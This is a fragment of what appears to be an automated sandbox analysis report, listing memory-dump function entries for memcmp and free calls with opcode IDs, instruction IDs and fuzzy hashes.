                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                        • Instruction ID: fa8ec5340352e96c22965deffa74115180eefc47324709767a383a60ab910941
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB01D2B2399B5145EF049F2A9C623A833D5DB5AFC5F8944718E059B301EF38D946C314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                        • Instruction ID: 93a2e2004d5ca49f7d292d06cb99744d2592b0a21af2ceae7feeba90463f4b78
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D01DEB230471181EB059F22EC523A837959B0AFD5F88C0B9CF1AAB302EF38DA55C304
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                        • Instruction ID: b51f93a9172994c592e0e249ec748c90a9c484fbb1e6ccdaa78af6c01057596a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701C0A230475191EF04DB669C623A823E59B0AFD5F8894A1CE4A97306EB38CA46D304
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                        • Instruction ID: 3f34f81f29d0b1d7da06ea068fb3d1cf05c050ca54be7c78ce30cd68c768be72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5501C4A230475091EB04DF269C523A42792970AFD5F849479CE199B305EF34D949C304
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                        • Instruction ID: 1ca1aede9f3dde87c264c66d4e41953fa4e7ba209b98f59007cc65ef21018cc2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1301B563312DC4849531AE57DC9072B6654EB42BE771D41D5EF2D0B350DF60C84BC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                        • Instruction ID: d7e44adb693a6f9ed0a52f544fa2a74f5d824cb01966303e2adf91bd87e4f772
                                                                                                                                                                                                        • Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29F05E53713994898A10AF2ADC9126923A4AF56BAAB1C45F1EF2D1B754EE20CC568B10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                        • Instruction ID: e1ab641e5c735128efafe23a7af81fcf94d86aaf2cbccfe677ba7665c1c55eca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1F0BE13B539809A8A10AF37EC9026963A0FB47BA670C01F1EF1D1BB44DE20C8668700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                        • Instruction ID: 7b8d88ca5e66cb90256c2f4c84e0c06b0c2d1c6ecf0349a832bd644e1389896c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F05413713C8489C611AF36DC512695360DB96FD6B1D82E29F2D1B355DE24C8468700